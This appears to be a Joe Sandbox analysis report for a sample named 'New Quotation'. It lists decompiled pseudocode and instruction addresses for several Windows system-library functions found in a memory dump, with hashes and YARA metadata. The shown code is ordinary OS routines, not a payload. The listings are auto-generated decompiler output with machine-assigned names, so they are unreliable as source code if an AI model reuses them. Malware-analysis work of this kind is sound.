                                                                                                                                                                                          0x1d82a325
                                                                                                                                                                                          0x1d82a32a
                                                                                                                                                                                          0x1d82a32b
                                                                                                                                                                                          0x1d82a330
                                                                                                                                                                                          0x1d82a332
                                                                                                                                                                                          0x1d82a34a
                                                                                                                                                                                          0x1d82a34a
                                                                                                                                                                                          0x1d82a34c
                                                                                                                                                                                          0x1d82a34c
                                                                                                                                                                                          0x1d82a34f
                                                                                                                                                                                          0x1d82a34f
                                                                                                                                                                                          0x1d82a352
                                                                                                                                                                                          0x1d82a355
                                                                                                                                                                                          0x1d82a355
                                                                                                                                                                                          0x1d82a360
                                                                                                                                                                                          0x1d82a363
                                                                                                                                                                                          0x1d82a367
                                                                                                                                                                                          0x1d82a36d
                                                                                                                                                                                          0x1d82a370
                                                                                                                                                                                          0x1d82a371
                                                                                                                                                                                          0x1d82a374
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a376
                                                                                                                                                                                          0x1d82a338
                                                                                                                                                                                          0x1d82a33b
                                                                                                                                                                                          0x1d82a341
                                                                                                                                                                                          0x1d82a342
                                                                                                                                                                                          0x1d82a345
                                                                                                                                                                                          0x1d82a348
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a348
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a2f9
                                                                                                                                                                                          0x1d82a2d6
                                                                                                                                                                                          0x1d82a2da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a2da
                                                                                                                                                                                          0x1d7ccde2
                                                                                                                                                                                          0x1d7ccde2

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: AlternateCodePage
                                                                                                                                                                                          • API String ID: 0-3889302423
                                                                                                                                                                                          • Opcode ID: 21783fa64a741affbd27759aefffdc0adde8c5af1803ebc1001a57d2327c9a11
                                                                                                                                                                                          • Instruction ID: fc44e4d7c6f8b340e81f361b2ee1d08dd14b0242514cdc294411254f861780a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21783fa64a741affbd27759aefffdc0adde8c5af1803ebc1001a57d2327c9a11
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6417F76D0020AAECB14CB99CC84AFFF7B8FF84714F51415AE515A7250E634AF81CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88ADD6 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E1D88ADD6(void* __ecx, intOrPtr __edx, char* _a4, short* _a8) {
				void* _v8;
				signed int _v12;
				char _v16;
				short _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				void* _t41;
				short _t52;
				char* _t57;
				void* _t64;
				short* _t68;
				void* _t75;
				void* _t77;
				void* _t78;

				_t77 = __ecx;
				_v24 = __edx;
				_v20 = 0;
				_t75 = 0;
				_v8 = 0xffffffff;
				if(__edx == 0 || __ecx == 0) {
					_t78 = 0xc000000d;
					goto L22;
				} else {
					_v12 = _v12 & 0;
					_v16 = 1;
					E1D815050(0xffffffff,  &_v36, L"PreferredUILanguages");
					_push(0xffffffff);
					_t64 = __ecx;
					_t41 = E1D7CD64A(__ecx,  &_v36,  &_v16, 0,  &_v12);
					if(_v12 == 0 || _t41 == 0xc0000034) {
						_t78 = 0xc0000001;
						goto L24;
					} else {
						_t75 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
						if(_t75 != 0) {
							_push(_t64);
							_t65 = _t77;
							_t78 = E1D7CD64A(_t77,  &_v36,  &_v16, _t75,  &_v12);
							if(_t78 < 0) {
								L22:
								if(_t75 != 0) {
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t75);
								}
								goto L24;
							}
							if(_v16 == 1) {
								E1D815050(_t65,  &_v36, _t75);
								if(E1D7F56E0( &_v36,  &_v28) == 0) {
									goto L8;
								}
								_t52 = _v28;
								if(_t52 == 0x1000 || _t52 == 0x1400) {
									_t78 = E1D7CD853( &_v20, _v24, _v32, 0,  &_v20);
									if(_t78 < 0) {
										goto L22;
									}
									_push(3);
									_pop(1);
									goto L15;
								} else {
									_v20 = _t52;
									L15:
									_t78 = E1D7F4EDF(_v24, 1, _v20,  &_v8);
									if(_t78 >= 0) {
										_t57 = _a4;
										if(_t57 != 0) {
											 *_t57 = 2;
										}
										_t68 = _a8;
										if(_t68 != 0) {
											 *_t68 = _v8;
										}
									}
									goto L22;
								}
							}
							L8:
							_t78 = 0xc0000001;
							goto L22;
						} else {
							_t78 = 0xc0000017;
							L24:
							return _t78;
						}
					}
				}
			}



















                                                                                                                                                                                          0x1d88ade0
                                                                                                                                                                                          0x1d88ade6
                                                                                                                                                                                          0x1d88adea
                                                                                                                                                                                          0x1d88adee
                                                                                                                                                                                          0x1d88adf3
                                                                                                                                                                                          0x1d88adf9
                                                                                                                                                                                          0x1d88af1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88ae07
                                                                                                                                                                                          0x1d88ae07
                                                                                                                                                                                          0x1d88ae16
                                                                                                                                                                                          0x1d88ae19
                                                                                                                                                                                          0x1d88ae1e
                                                                                                                                                                                          0x1d88ae22
                                                                                                                                                                                          0x1d88ae2d
                                                                                                                                                                                          0x1d88ae35
                                                                                                                                                                                          0x1d88af13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88ae46
                                                                                                                                                                                          0x1d88ae59
                                                                                                                                                                                          0x1d88ae5d
                                                                                                                                                                                          0x1d88ae69
                                                                                                                                                                                          0x1d88ae6d
                                                                                                                                                                                          0x1d88ae7d
                                                                                                                                                                                          0x1d88ae81
                                                                                                                                                                                          0x1d88af1f
                                                                                                                                                                                          0x1d88af21
                                                                                                                                                                                          0x1d88af2f
                                                                                                                                                                                          0x1d88af2f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88af21
                                                                                                                                                                                          0x1d88ae8a
                                                                                                                                                                                          0x1d88ae9b
                                                                                                                                                                                          0x1d88aeaf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88aeb1
                                                                                                                                                                                          0x1d88aeb9
                                                                                                                                                                                          0x1d88aed9
                                                                                                                                                                                          0x1d88aedd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88aedf
                                                                                                                                                                                          0x1d88aee1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88aec2
                                                                                                                                                                                          0x1d88aec2
                                                                                                                                                                                          0x1d88aee2
                                                                                                                                                                                          0x1d88aef3
                                                                                                                                                                                          0x1d88aef7
                                                                                                                                                                                          0x1d88aef9
                                                                                                                                                                                          0x1d88aefe
                                                                                                                                                                                          0x1d88af00
                                                                                                                                                                                          0x1d88af00
                                                                                                                                                                                          0x1d88af03
                                                                                                                                                                                          0x1d88af08
                                                                                                                                                                                          0x1d88af0e
                                                                                                                                                                                          0x1d88af0e
                                                                                                                                                                                          0x1d88af08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88aef7
                                                                                                                                                                                          0x1d88aeb9
                                                                                                                                                                                          0x1d88ae8c
                                                                                                                                                                                          0x1d88ae8c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88ae5f
                                                                                                                                                                                          0x1d88ae5f
                                                                                                                                                                                          0x1d88af34
                                                                                                                                                                                          0x1d88af3a
                                                                                                                                                                                          0x1d88af3a
                                                                                                                                                                                          0x1d88ae5d
                                                                                                                                                                                          0x1d88ae35

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: PreferredUILanguages
                                                                                                                                                                                          • API String ID: 0-1884656846
                                                                                                                                                                                          • Opcode ID: 8b46151d4d7027495139b996d00c307f7f5b0545d5bb2331443b5ec9a532501c
                                                                                                                                                                                          • Instruction ID: b7211e5fd190a33e681479d10662a122f85967b86ab5b08e12eb1ac93418b0db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b46151d4d7027495139b996d00c307f7f5b0545d5bb2331443b5ec9a532501c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41A376D04219ABCB12CB94C880AFFB7B9EF44750F014566FA11F7291E674EE40C7A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CFF30 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E1D7CFF30(intOrPtr* _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr* _t43;
				char _t70;
				intOrPtr _t77;
				intOrPtr* _t79;

				_t79 = _a4;
				_t70 = 0;
				_t77 =  *[fs:0x30];
				_v32 = 0;
				_v28 = 0;
				_v12 = 0;
				 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t77 + 0xa4));
				 *((intOrPtr*)(_t79 + 8)) =  *((intOrPtr*)(_t77 + 0xa8));
				 *(_t79 + 0xc) =  *(_t77 + 0xac) & 0x0000ffff;
				 *((intOrPtr*)(_t79 + 0x10)) =  *((intOrPtr*)(_t77 + 0xb0));
				_t43 =  *((intOrPtr*)(_t77 + 0x1f4));
				if(_t43 != 0 &&  *_t43 != 0) {
					if(E1D7F5C3F(_t79 + 0x14, 0x100, _t43) < 0) {
						 *((short*)(_t79 + 0x14)) = 0;
					}
					_t70 = 0;
				} else {
					 *((short*)(_t79 + 0x14)) = 0;
				}
				if( *_t79 != 0x11c) {
					if( *_t79 != 0x124) {
						L10:
						return 0;
					}
				}
				 *((short*)(_t79 + 0x114)) =  *(_t77 + 0xaf) & 0x000000ff;
				 *(_t79 + 0x116) =  *(_t77 + 0xae) & 0x000000ff;
				 *(_t79 + 0x118) = E1D7D0670();
				if( *_t79 == 0x124) {
					 *(_t79 + 0x11c) = E1D7D0670() & 0x0001ffff;
				}
				 *((char*)(_t79 + 0x11a)) = _t70;
				if(E1D7D0630( &_v16) != 0) {
					 *((char*)(_t79 + 0x11a)) = _v16;
				}
				E1D815050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
				_push( &_v24);
				_push("true");
				_push( &_v12);
				_push( &_v20);
				_push( &_v32);
				if(E1D813EE0() < 0 || _v12 != 1 || _v20 != 4 || _v24 != 4) {
					 *(_t79 + 0x118) =  *(_t79 + 0x118) & 0x0000ffef | 0x00000100;
					if( *_t79 == 0x124) {
						 *(_t79 + 0x11c) =  *(_t79 + 0x11c) & 0xfffdffef | 0x00000100;
					}
				}
				goto L10;
			}













                                                                                                                                                                                          0x1d7cff3a
                                                                                                                                                                                          0x1d7cff3d
                                                                                                                                                                                          0x1d7cff40
                                                                                                                                                                                          0x1d7cff4c
                                                                                                                                                                                          0x1d7cff4f
                                                                                                                                                                                          0x1d7cff52
                                                                                                                                                                                          0x1d7cff5b
                                                                                                                                                                                          0x1d7cff64
                                                                                                                                                                                          0x1d7cff6e
                                                                                                                                                                                          0x1d7cff77
                                                                                                                                                                                          0x1d7cff7a
                                                                                                                                                                                          0x1d7cff82
                                                                                                                                                                                          0x1d82e82e
                                                                                                                                                                                          0x1d82e832
                                                                                                                                                                                          0x1d82e832
                                                                                                                                                                                          0x1d82e836
                                                                                                                                                                                          0x1d7cff8d
                                                                                                                                                                                          0x1d7cff8f
                                                                                                                                                                                          0x1d7cff8f
                                                                                                                                                                                          0x1d7cff99
                                                                                                                                                                                          0x1d7d005c
                                                                                                                                                                                          0x1d7d004f
                                                                                                                                                                                          0x1d7d0053
                                                                                                                                                                                          0x1d7d0053
                                                                                                                                                                                          0x1d7d005e
                                                                                                                                                                                          0x1d7cffab
                                                                                                                                                                                          0x1d7cffbc
                                                                                                                                                                                          0x1d7cffcd
                                                                                                                                                                                          0x1d7cffd6
                                                                                                                                                                                          0x1d7d006d
                                                                                                                                                                                          0x1d7d006d
                                                                                                                                                                                          0x1d7cffdf
                                                                                                                                                                                          0x1d7cffed
                                                                                                                                                                                          0x1d7cfff2
                                                                                                                                                                                          0x1d7cfff2
                                                                                                                                                                                          0x1d7d0001
                                                                                                                                                                                          0x1d7d0009
                                                                                                                                                                                          0x1d7d000a
                                                                                                                                                                                          0x1d7d000f
                                                                                                                                                                                          0x1d7d0013
                                                                                                                                                                                          0x1d7d0017
                                                                                                                                                                                          0x1d7d001f
                                                                                                                                                                                          0x1d7d0042
                                                                                                                                                                                          0x1d7d004b
                                                                                                                                                                                          0x1d7d0085
                                                                                                                                                                                          0x1d7d0085
                                                                                                                                                                                          0x1d7d004b
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D7CFFF8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                                                                                                          • API String ID: 0-996340685
                                                                                                                                                                                          • Opcode ID: 9c130573b1e5c5674254099295a4824b58436d0d0eeb35d6586751eb686266a9
                                                                                                                                                                                          • Instruction ID: 8a25dd95ba776620f556975dd73a4cc7f251b26bf3d6ad02c807fd182a1ef176
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c130573b1e5c5674254099295a4824b58436d0d0eeb35d6586751eb686266a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2415075A00B4AAED765DFB4C4406EBB7F4EF49750F40482ED6AAC3240E334A545CBA7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84C920 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E1D84C920(intOrPtr _a4, char* _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char* _v24;
				short _v26;
				char _v28;
				short _t27;
				short _t28;
				void* _t44;
				void* _t53;
				void* _t63;

				_t27 = 0x20;
				_v28 = _t27;
				_t28 = 0x22;
				_v20 = 0;
				_v26 = _t28;
				_v24 = L"TrustedInstaller";
				_v16 = 0;
				if(_a8 == 0) {
					return 0xc000000d;
				}
				_push( &_v12);
				_push(0);
				_push(0);
				_push(1);
				_push(_a4);
				_t63 = E1D813F60();
				if(_t63 == 0xc0000023) {
					_t56 =  *[fs:0x30];
					_t53 = E1D7E5D90( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
					if(_t53 != 0) {
						_push( &_v12);
						_push(_v12);
						_push(_t53);
						_push(1);
						_push(_a4);
						_t63 = E1D813F60();
						if(_t63 >= 0) {
							_t63 = E1D80AAB0(_t53,  &_v20,  &_v5);
							if(_t63 >= 0 && _v20 != 0) {
								_t63 = E1D7CC1D0( &_v28, 0,  &_v16);
								if(_t63 == 0xc0000023) {
									_t44 = E1D7E5D90(_t56,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v16);
									_t61 = _t44;
									if(_t44 != 0) {
										_t63 = E1D7CC1D0( &_v28, _t61,  &_v16);
										if(_t63 >= 0) {
											 *_a8 = E1D7F8600(_v20, _t61);
										}
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
									}
								}
							}
						}
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
					}
				}
				return _t63;
			}















                                                                                                                                                                                          0x1d84c92a
                                                                                                                                                                                          0x1d84c92d
                                                                                                                                                                                          0x1d84c933
                                                                                                                                                                                          0x1d84c934
                                                                                                                                                                                          0x1d84c937
                                                                                                                                                                                          0x1d84c93b
                                                                                                                                                                                          0x1d84c942
                                                                                                                                                                                          0x1d84c948
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84c94a
                                                                                                                                                                                          0x1d84c959
                                                                                                                                                                                          0x1d84c95a
                                                                                                                                                                                          0x1d84c95b
                                                                                                                                                                                          0x1d84c95c
                                                                                                                                                                                          0x1d84c95e
                                                                                                                                                                                          0x1d84c966
                                                                                                                                                                                          0x1d84c96f
                                                                                                                                                                                          0x1d84c975
                                                                                                                                                                                          0x1d84c98a
                                                                                                                                                                                          0x1d84c98e
                                                                                                                                                                                          0x1d84c997
                                                                                                                                                                                          0x1d84c998
                                                                                                                                                                                          0x1d84c99b
                                                                                                                                                                                          0x1d84c99c
                                                                                                                                                                                          0x1d84c99e
                                                                                                                                                                                          0x1d84c9a6
                                                                                                                                                                                          0x1d84c9aa
                                                                                                                                                                                          0x1d84c9ba
                                                                                                                                                                                          0x1d84c9be
                                                                                                                                                                                          0x1d84c9d5
                                                                                                                                                                                          0x1d84c9d9
                                                                                                                                                                                          0x1d84c9e9
                                                                                                                                                                                          0x1d84c9ee
                                                                                                                                                                                          0x1d84c9f2
                                                                                                                                                                                          0x1d84ca02
                                                                                                                                                                                          0x1d84ca06
                                                                                                                                                                                          0x1d84ca14
                                                                                                                                                                                          0x1d84ca14
                                                                                                                                                                                          0x1d84ca22
                                                                                                                                                                                          0x1d84ca22
                                                                                                                                                                                          0x1d84c9f2
                                                                                                                                                                                          0x1d84c9d9
                                                                                                                                                                                          0x1d84c9be
                                                                                                                                                                                          0x1d84ca33
                                                                                                                                                                                          0x1d84ca33
                                                                                                                                                                                          0x1d84ca38
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: TrustedInstaller
                                                                                                                                                                                          • API String ID: 0-565535830
                                                                                                                                                                                          • Opcode ID: f855fc93ad2faccf837c75e8a7155fd41300a22a8c548f69f7ab4eca4b1480b5
                                                                                                                                                                                          • Instruction ID: 13867882e4c68f8ce8b33e5cfc9ed29d0bfd40158c405bfdca742cc5cdaaa415
                                                                                                                                                                                          • Opcode Fuzzy Hash: f855fc93ad2faccf837c75e8a7155fd41300a22a8c548f69f7ab4eca4b1480b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631B07694111DBFDB12CB94DC44FAEB7BCEF04650F114025BA00EB260D7709E40C791
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D4FB6 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7D4FB6(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L22:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L22;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                                                                                          0x1d7d4fbd
                                                                                                                                                                                          0x1d7d4fc2
                                                                                                                                                                                          0x1d7d4fc6
                                                                                                                                                                                          0x1d830531
                                                                                                                                                                                          0x1d7d5005
                                                                                                                                                                                          0x1d7d5009
                                                                                                                                                                                          0x1d7d5009
                                                                                                                                                                                          0x1d7d4fd2
                                                                                                                                                                                          0x1d83053b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83053b
                                                                                                                                                                                          0x1d7d4fd8
                                                                                                                                                                                          0x1d7d4fda
                                                                                                                                                                                          0x1d7d4fdc
                                                                                                                                                                                          0x1d7d4fdf
                                                                                                                                                                                          0x1d7d4fe6
                                                                                                                                                                                          0x1d7d5018
                                                                                                                                                                                          0x1d7d5052
                                                                                                                                                                                          0x1d7d5052
                                                                                                                                                                                          0x1d7d4ff4
                                                                                                                                                                                          0x1d7d4ffa
                                                                                                                                                                                          0x1d7d4ffd
                                                                                                                                                                                          0x1d7d4fff
                                                                                                                                                                                          0x1d7d5001
                                                                                                                                                                                          0x1d7d500f
                                                                                                                                                                                          0x1d7d5011
                                                                                                                                                                                          0x1d7d5011
                                                                                                                                                                                          0x1d7d500f
                                                                                                                                                                                          0x1d7d5003
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5003
                                                                                                                                                                                          0x1d7d501d
                                                                                                                                                                                          0x1d7d504c
                                                                                                                                                                                          0x1d7d504e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d504e
                                                                                                                                                                                          0x1d7d501f
                                                                                                                                                                                          0x1d7d5022
                                                                                                                                                                                          0x1d7d5024
                                                                                                                                                                                          0x1d7d5026
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5028
                                                                                                                                                                                          0x1d7d4fe8
                                                                                                                                                                                          0x1d7d4fed
                                                                                                                                                                                          0x1d7d502d
                                                                                                                                                                                          0x1d7d5033
                                                                                                                                                                                          0x1d7d5043
                                                                                                                                                                                          0x1d7d5048
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5048
                                                                                                                                                                                          0x1d7d5038
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d503d
                                                                                                                                                                                          0x1d7d5059
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d5059
                                                                                                                                                                                          0x1d7d503f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d4fef
                                                                                                                                                                                          0x1d7d4fef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d4fef

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: Actx
                                                                                                                                                                                          • API String ID: 0-89312691
                                                                                                                                                                                          • Opcode ID: 0ecec672457f132e33628a6cfd788eebb8339bb80e5cce1a95d91f7f6b5b5826
                                                                                                                                                                                          • Instruction ID: 925f680d6efc0f3ef482cc64a9c6da8484a904d333ac126b1245ec7e2f967065
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ecec672457f132e33628a6cfd788eebb8339bb80e5cce1a95d91f7f6b5b5826
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7119030704F438BEBA64D2DD44067A73D9FB92674F64853BE455EB3A8D671E8418383
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D850CEE Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E1D850CEE(void* __ebx, intOrPtr* __ecx, void* __edx, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* _v104;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t41;
				void* _t44;
				signed int _t45;

				_t38 = __edx;
				_t33 = __ebx;
				_t47 = (_t45 & 0xfffffff8) - 0x68;
				_v8 =  *0x1d8cb370 ^ (_t45 & 0xfffffff8) - 0x00000068;
				_t26 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t26 = E1D7D0FB0(__ecx, __edx, 0x1d8c6988, 0x1d851000, 0, 0);
					if( *0x1d8c3368 > 4 && E1D7CDE1A(0x1d8c3368, 0, 0x4000) != 0) {
						_t38 = 0x1d7b0b50;
						_v100 = _a4;
						_v96 = _a8;
						_v44 =  &_v100;
						_v28 =  &_v104;
						_v60 = "LdrCreateEnclave";
						_v56 = 0;
						_v52 = 0x11;
						_v48 = 0;
						_v40 = 0;
						_v36 = 8;
						_v32 = 0;
						_v104 = __ecx;
						_v24 = 0;
						_v20 = 4;
						_v16 = 0;
						_t26 = E1D85105C(0x1d8c3368, 0x1d7b0b50, 0x1d8c3368, 0x1d8c3368, 5,  &_v92);
					}
				}
				_pop(_t41);
				_pop(_t44);
				return E1D814B50(_t26, _t33, _v8 ^ _t47, _t38, _t41, _t44);
			}


























                                                                                                                                                                                          0x1d850cee
                                                                                                                                                                                          0x1d850cee
                                                                                                                                                                                          0x1d850cf6
                                                                                                                                                                                          0x1d850d00
                                                                                                                                                                                          0x1d850d04
                                                                                                                                                                                          0x1d850d13
                                                                                                                                                                                          0x1d850d25
                                                                                                                                                                                          0x1d850d31
                                                                                                                                                                                          0x1d850d4e
                                                                                                                                                                                          0x1d850d53
                                                                                                                                                                                          0x1d850d5a
                                                                                                                                                                                          0x1d850d62
                                                                                                                                                                                          0x1d850d6a
                                                                                                                                                                                          0x1d850d77
                                                                                                                                                                                          0x1d850d7f
                                                                                                                                                                                          0x1d850d83
